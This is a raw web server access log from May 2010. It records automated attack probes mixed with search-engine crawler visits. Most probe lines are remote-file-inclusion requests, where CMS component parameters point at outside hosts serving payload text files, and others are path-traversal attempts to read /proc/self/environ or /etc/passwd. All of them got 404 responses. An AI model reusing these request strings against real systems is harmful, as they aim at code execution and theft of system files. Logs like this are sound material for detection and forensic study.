70.38.117.233 - - [01/May/2010:04:11:57 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:14:05 -0500] "GET /logs/access_log.1265241600/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:14:05 -0500] "GET /write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:14:05 -0500] "GET /logs/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:14:05 -0500] "GET /logs/access_log.1264032000/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.195.229 - - [01/May/2010:04:14:24 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.59.48.68 - - [01/May/2010:04:16:43 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.59.48.68 - - [01/May/2010:04:16:44 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.199.190 - - [01/May/2010:04:18:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.23.8.91 - - [01/May/2010:04:19:31 -0500] "GET /logs///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:19:31 -0500] "GET /logs/access_log.1268611200%20%20///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:19:31 -0500] "GET ///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 295 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:19:49 -0500] "GET //bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:19:49 -0500] "GET /logs/access_log.1270684800%20%20//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:19:49 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:20:10 -0500] "GET ///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 295 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:20:10 -0500] "GET //bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:20:10 -0500] "GET /logs///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:20:10 -0500] "GET /logs/access_log.1268611200%20%20///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:20:10 -0500] "GET /logs/access_log.1270684800%20%20//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:20:10 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:20:59 -0500] "GET //bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:21:08 -0500] "GET /logs/access_log.1270684800%20%20//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:21:08 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.119 - - [01/May/2010:04:21:17 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [01/May/2010:04:21:17 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.232.85.247 - - [01/May/2010:04:24:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:24:07 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:24:07 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:25:24 -0500] "GET /logs/access_log.1268611200///_head.php?_zb_path=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:46 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:46 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:47 -0500] "GET /logs/access_log.1270512000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:50 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:50 -0500] "GET /logs/access_log.1270512000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:50 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:51 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:51 -0500] "GET /logs/access_log.1270512000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:51 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:54 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:54 -0500] "GET /logs/access_log.1270512000%20%20//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:54 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:54 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:54 -0500] "GET /logs/access_log.1270512000%20%20//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:55 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:55 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:55 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:04:27:55 -0500] "GET /logs/access_log.1270512000%20%20//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:28:07 -0500] "GET /logs/access_log.1266537600/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:28:07 -0500] "GET /logs/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:04:28:07 -0500] "GET /write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:08 -0500] "GET /logs/access_log.1270512000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:09 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:09 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:20 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:20 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:28:20 -0500] "GET /logs/access_log.1270512000%20%20//facil-cms//includes/facil-settings.php?FACIL_THEME=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:04:30:11 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 200 1230 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.142 - - [01/May/2010:04:32:54 -0500] "GET /logs/access_log.1176681600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:04:35:44 -0500] "GET /logs/access_log.1185753600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
115.124.119.4 - - [01/May/2010:04:38:49 -0500] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:38:49 -0500] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:38:51 -0500] "GET /logs/access_log.1263945600/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:04:38:52 -0500] "GET /logs/access_log.1266451200/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:40:54 -0500] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:40:54 -0500] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:40:54 -0500] "GET /logs/access_log.1263340800///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:41:08 -0500] "GET /logs/access_log.1264809600///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:43:06 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 373 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:43:06 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 349 "-""Mozilla/5.0"
217.23.8.91 - - [01/May/2010:04:43:06 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://docs.google.com/View?id=df2nxq5q_1f22tjmwj? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:45:40 -0500] "GET ///components/config.sef.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:45:40 -0500] "GET /logs/access_log.1266019200///components/config.sef.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:45:40 -0500] "GET /logs///components/config.sef.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:04:46:01 -0500] "GET /logs/access_log.1264204800///components/config.sef.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:52:43 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:52:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:52:44 -0500] "GET /logs/access_log.1219708800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:04:56:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:04:56:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:04:56:21 -0500] "GET /logs/access_log.1266451200//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
174.120.217.139 - - [01/May/2010:04:56:31 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.120.217.139 - - [01/May/2010:04:56:31 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.120.217.139 - - [01/May/2010:04:56:31 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.232.85.247 - - [01/May/2010:04:56:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:56:45 -0500] "GET /logs/access_log.1266451200//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:04:56:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
92.241.190.214 - - [01/May/2010:04:57:38 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:04:57:39 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
92.241.190.214 - - [01/May/2010:04:57:39 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.46.195.229 - - [01/May/2010:05:02:25 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.84 - - [01/May/2010:05:02:55 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/May/2010:05:03:40 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.120.217.139 - - [01/May/2010:05:04:34 -0500] "GET /logs/access_log.1232668800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
212.175.146.45 - - [01/May/2010:05:05:51 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.76"
66.249.71.36 - - [01/May/2010:05:06:08 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.185 - - [01/May/2010:05:06:25 -0500] "GET /logs/access_log.1266105600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.119 - - [01/May/2010:05:06:29 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=/../../../../../../../../etc/passwd HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [01/May/2010:05:06:29 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=/../../../../../../../../etc/passwd HTTP/1.1" 404 330 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.175.146.45 - - [01/May/2010:05:06:36 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:05:06:36 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.76"
216.129.119.43 - - [01/May/2010:05:08:20 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 664329 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
92.241.190.214 - - [01/May/2010:05:09:03 -0500] "GET /logs/access_log.1232668800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
207.46.204.183 - - [01/May/2010:05:09:55 -0500] "GET /logs/access_log.1260316800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [01/May/2010:05:10:08 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 200 586690 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
212.175.146.45 - - [01/May/2010:05:10:53 -0500] "GET /logs/access_log.1207958400//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:05:10:53 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:05:10:54 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.76"
208.115.111.248 - - [01/May/2010:05:12:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.204.189 - - [01/May/2010:05:14:24 -0500] "GET /logs/access_log.1187049600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.251.224 - - [01/May/2010:05:18:16 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.241.251.224 - - [01/May/2010:05:18:16 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.241.251.224 - - [01/May/2010:05:18:17 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.195.228 - - [01/May/2010:05:19:25 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.175.146.45 - - [01/May/2010:05:22:51 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.76"
207.46.194.100 - - [01/May/2010:05:23:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.100 - - [01/May/2010:05:23:08 -0500] "GET /artwork/totems2.png HTTP/1.1" 200 65973 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
78.110.50.139 - - [01/May/2010:05:29:52 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:05:29:52 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:05:29:52 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
